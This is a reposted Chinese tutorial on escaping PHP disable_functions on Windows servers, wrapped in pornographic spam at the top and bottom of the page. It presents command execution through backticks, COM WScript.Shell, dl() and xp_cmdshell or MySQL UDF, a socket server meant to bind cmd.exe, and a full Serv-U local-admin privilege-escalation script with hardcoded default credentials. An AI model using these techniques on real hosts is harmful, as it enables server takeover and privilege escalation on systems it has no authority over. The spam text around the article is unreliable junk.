麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 編程 > PHP > 正文

php在Windows上的一些突破

2020-03-22 20:14:42
字體:
來源:轉載
供稿:網友
  • 1、disable_functions的突破
    在php -4.0.1以上的版本,php.ini里引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執行這些函數的時候將會提示Warning: system() has been disabled for security reasons,同時程序終止運行。但是也不是沒有辦法執行系統命令了。因為php采用了很多perl的特性,比如還可以用(`)來執行命令。
    <?
    $output = `ls -al`;
    echo "<pre>$output</pre>";
    ?>
    據說這個只有設成safe_mode為on才能避免。

    2、dl()函數的應用

    當任何PHP的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用于safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調用W32api 函數,可惜這個擴展已被移動到 PECL 庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊里的例子:

    // 加載此擴展
    dl("php_w32api.dll");

    // 注冊 GetTickCount 函數,來自 kernel32.dll
    w32api_register_function("kernel32.dll","GetTickCount","long");

    // 注冊 MessageBoxA 函數,來自 User32.dll
    w32api_register_function("User32.dll","MessageBoxA","long");
    // 取得開機時間信息
    $ticks = GetTickCount();
    // 轉換為易于理解的文本
    $secs = floor($ticks / 1000);
    $mins = floor($secs / 60);
    $hours = floor($mins / 60);
    $str = sprintf("You have been using your computer for:".
    "/r/n %d Milliseconds, or /r/n %d Seconds".
    "or /r/n %d mins or/r/n %d hours %d mins.",$ticks,$secs,$mins,$hours,$mins - ($hours*60)

    );

    // 顯示一個消息對話框,只有一個 OK 按鈕和上面的開機時間文本
    MessageBoxA(NULL,
    $str,
    "Uptime Information",
    MB_OK);
    ?>

    可惜我還沒有理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導讀者。

    3、COM 和 .Net(Windows)函數的應用

    COM(Component Object Model,組件對象模型)是微軟開發的軟件規范,它用于開發html' target='_blank'>面向對象的、編譯好的軟件組件,它允許把軟件抽象成為二進制的部件,主要運用于windows平臺。
    PHP 的 Windows 版本已經內置該擴展模塊的支持。無需加載任何附加擴展庫即可使用COM函數。它的使用方法類似于C++或Java中類的創建的語法,并把COM的類名作為參數傳遞到構造函數。例如使用在PHP中調用“WScript.Shell”執行系統命令:
    <?
    $cmd=” E:/cert/admin/psexec.exe”;
    if($com=new COM("WScript.Shell")) echo "yes";

    if(!$cmd1=$com->exec($cmd))
    {
    echo "can not exec()";
    }

    if(!$cmd2=$cmd1->stdout())
    {
    echo "can not stdout()";
    }

    if(!$cmd3=$cmd2->readall())
    {
    echo "can not readall()";
    }
    echo $cmd3;
    ?>

    這段代碼與ASP的<%=server.createobject("wscript.shell").exec("cmd.exe /c netstat –an”).stdout.readall%>的意思是一模一樣的,當然,你也可以像ASP那樣調用“ADODB.Connection”,利用這個組件結合jet2溢出漏洞,可能能夠在PHP Saft mode=ON下拿到一個Shell。

    <?php
    //create the database connection
    $conn = new COM("ADODB.Connection");
    $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
    $conn->Open($dsn);
    //pull the data through SQL string
    $rs = $conn->Execute("select clients from web");
    …..
    ?>

    .Net 函數只能運行在 PHP 5上,當然,它需要 “.Net runtime”的支持,而且這的PHP的一個實驗性模塊,功能還未齊全,所以在這就不討論了。

    4、Java()函數的應用

    該方法適用于safe mode=on。要使用JAVA模塊服務器必須事先安裝Java虛擬機,而且在PHP安裝配置的時候打開了with-java的選項,代碼如下:

    [JAVA]
    ;這是到php_java.jar的路徑
    ;java.class.path = ./php_java.jar
    ;JDK的路徑
    ;Java.home = f:/jdk1.3.0
    ;到虛擬機的路徑
    ;Java.library=f:/jdk1.3.0/jre/bin/hostspot/jvm.dll
    同COM一樣,使用Java創建類(不僅僅是JavaBeans)只需把JAVA的類名作為參數傳遞到構造函數。以下是手冊里邊的一個例子:
    <?php
    // This example is only intended to be run as a CGI.

    $frame = new Java('java.awt.Frame', 'PHP');
    $button = new Java('java.awt.Button', 'Hello Java World!');

    $frame->add('North', $button);
    $frame->validate();
    $frame->pack();
    $frame->visible = True;

    $thread = new Java('java.lang.Thread'); $thread->sleep(10000);

    $frame->dispose();
    ?>

    可惜能真正支持JAVA的PHP服務器并不多見,所以在這也不多討論了。

    5、socket()函數的應用

    socket 是PHP中功能極為強大的一個模塊,如果你使用高級的、抽象的接口(由fsockopen()和psockopen函數打開的socket),是不需要打開“php_sockets.dll”的。但是如果要使用完整的socket函數塊,就必須在php.ini這樣設置:

    ;Windows Extensions
    ;Note that MySQL and ODBC support is now built in, so no dll is needed for it.
    ……..
    ;去掉以下一句最前邊的分號
    ;extension=php_sockets.dll

    使用PHP的socket函數塊可以實現端口轉發/重定向、數據包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 還可以用它構造TCP/UDP服務器, 同時, 我覺得它也是突破服務器安全策略的一個最好的辦法。以下便是一個在服務器上打開端口構造TCP服務器的例子,你可以用它來捆綁上服務器的cmd.exe:
    <?php
    //在服務器上構造TCP服務
    //該例子需要php_sockets.dll的支持
    //執行后便可使用” telnet 127.0.0.1 1020”連接
    error_reporting(E_ALL);

    /* Allow the script to hang around waiting for connections. */
    set_time_limit(0);

    /* Turn on implicit output flushing so we see what we're getting
    * as it comes in. */
    ob_implicit_flush();

    //在服務器上綁定IP和端口
    $address = '127.0.0.1';
    $port = 1020;
    if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
    echo "socket_create() failed: reason: " . socket_strerror($sock) . "/n";
    }
    if (($ret = socket_bind($sock, $address, $port)) < 0) {
    echo "socket_bind() failed: reason: " . socket_strerror($ret) . "/n";
    }
    if (($ret = socket_listen($sock, 5)) < 0) {
    echo "socket_listen() failed: reason: " . socket_strerror($ret) . "/n";
    }
    do {
    if (($msgsock = socket_accept($sock)) < 0) {
    echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "/n";
    break;
    }
    /* Send instructions. */
    $msg = "/nWelcome to the PHP Test Server. /n" .
    "To quit, type 'quit'. To shut down the server type 'shutdown'./n";
    socket_write($msgsock, $msg, strlen($msg));
    do {
    if (false === socket_recv($msgsock, $buf , 1024, 0)) {
    echo "socket_read() failed: reason: " . socket_strerror($ret) . "/n";
    break 2;
    }
    if (!$buf = trim($buf)) {
    continue;
    }
    if ($buf == 'quit') {
    break;
    }
    if ($buf == 'shutdown') {
    socket_close($msgsock);
    break 2;
    }
    $talkback = "PHP: You said '$buf'./n";
    socket_write($msgsock, $talkback, strlen($talkback));
    echo "$buf/n";

    //以下處理接受到的buf
    /*eg:例如
    $buf=”cmd.exe /c netstat –an”;
    $pp = popen('$buf ', 'r');
    While($read = fgets($pp, 2096))
    echo $read;
    pclose($pp);
    */

    } while (true);
    socket_close($msgsock);
    } while (true);

    socket_close($sock);
    ?>

    事實上,很多主機都是沒有加載php_sockets.dll的,慶幸的是,不需要socket模塊支持的“fsockopen”函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀寫本機中未對外部開放的端口。使用fsockopen讀寫serv-u 的本地管理端口43958 (注: 該端口無法在外部連結) 進行提權便是一個很典型的例子:
    www.it165.net
    <?
    $adminuser=” LocalAdministrator”;
    $adminpass=” #l@$ak#.lk;0@P”;
    $adminport=” 43958”;
    $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
    if (!$fp) {
    echo "$errstr ($errno)<br>/n";
    } else {

    //可以寫入$shellcode
    // fputs ($fp, $shellcode);

    fputs ($fp, "USER ".$adminuser."/r/n");
    sleep (1);
    fputs ($fp, "PASS ".$adminpass."/r/n");
    sleep (1);
    fputs ($fp, "SITE MAINTENANCE/r/n");
    sleep (1);
    fputs ($fp, "-SETUSERSETUP/r/n");
    fputs ($fp, "-IP=".$addr."/r/n");
    fputs ($fp, "-PortNo=".$ftpport."/r/n");
    fputs ($fp, "-User=".$user."/r/n");
    fputs ($fp, "-Password=".$password."/r/n");
    fputs ($fp, "-HomeDir=".$homedir."/r/n");
    fputs ($fp, "-LoginMesFile=/r/n");
    fputs ($fp, "-Disable=0/r/n");
    fputs ($fp, "-RelPaths=0/r/n");
    fputs ($fp, "-NeedSecure=0/r/n");
    fputs ($fp, "-HideHidden=0/r/n");
    fputs ($fp, "-AlwaysAllowLogin=0/r/n"); fputs ($fp, "-ChangePassword=1/r/n");
    fputs ($fp, "-QuotaEnable=0/r/n");
    fputs ($fp, "-MaxUsersLoginPerIP=-1/r/n");
    fputs ($fp, "-SpeedLimitUp=-1/r/n");
    fputs ($fp, "-SpeedLimitDown=-1/r/n");
    fputs ($fp, "-MaxNrUsers=-1/r/n");
    fputs ($fp, "-IdleTimeOut=600/r/n");
    fputs ($fp, "-SessionTimeOut=-1/r/n");
    fputs ($fp, "-Expire=0/r/n");
    fputs ($fp, "-RatioUp=1/r/n");
    fputs ($fp, "-RatioDown=1/r/n");
    fputs ($fp, "-RatiosCredit=0/r/n");
    fputs ($fp, "-QuotaCurrent=0/r/n");
    fputs ($fp, "-QuotaMaximum=0/r/n");
    fputs ($fp, "-Maintenance=System/r/n");
    fputs ($fp, "-PasswordType=Regular/r/n");
    fputs ($fp, "-Ratios=None/r/n");
    fputs ($fp, " Access=".$homedir."|RWAMELCDP/r/n");
    fputs ($fp, "QUIT/r/n");
    sleep (1);
    while (!feof($fp)) {
    echo fgets ($fp,128);
    }
    }
    ?>

    還可以利用fsockopen編寫HTTP代理,從而訪問外網或本機中無法外部訪問的網站。我手上有一個完整的HTTPProxy(圖4),代碼較長。有興趣的讀者可以看看。

    6、MYSQL/MSSQL接口
    不同于linux的是,windows下的mysql/MSSQL一般是以系統管理員身份運行的,因此,只要能拿到本機SQL數據庫中的root/sa密碼,你就可以直接用PHP連接數據庫來執行系統命令。
    在Mysql中執行系統命令要利用用戶自定義函數“MySQL UDF Dynamic Library”這個漏洞。在MSSQL中只要連接上數據庫,就能直接調用“master..xp_cmdshell“擴展執行命令,權限當然是system權限。

    總結一下:由于系統、IIS、PHP的版本不一樣,以上提到的幾個突破方法可能會有所變化,PHP還有許多擴展功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全策略的限制!


    PHP編程

    鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

  • 發表評論 共有條評論
    用戶名: 密碼:
    驗證碼: 匿名發表
    主站蜘蛛池模板: 国产日韩亚洲 | 国内精品久久久久久久久久 | 亚洲成人福利网站 | 看片一区 | 免费视频a | 久久免费视频精品 | 亚洲日色 | 日本精品网 | 国产精品久久久久一区二区 | 一本色道久久99精品综合蜜臀 | 日本一区二区在线 | 精品中文字幕在线播放 | 99极品视频 | 午夜精品福利视频 | 国产一级毛片高清视频 | va视频在线| 黄色网址免费入口 | 性爱在线免费视频 | 亚洲第一成人久久网站 | 久草在线综合 | 国产精品久久久久久久久久久久久久久 | 久久伊人国产精品 | 国产大片全部免费看 | 激情小视频在线观看 | 国产毛片在线 | 狼人狠狠干 | 性少妇videosexfreexx入片 | 久久国产一 | 久久99精品久久久久久小说 | 黄 色 免费网 站 成 人 | 片在线观看 | 久久国产精品久久久久久电车 | 国产精品久久久久久婷婷天堂 | 欧美视屏一区二区 | 亚洲精品久久久久久久久久 | 欧美a∨亚洲欧美亚洲 | 一区www| 黄色大片在线观看 | 亚洲精品欧美在线 | 国产精品亚洲精品日韩已方 | 久久视频精品 |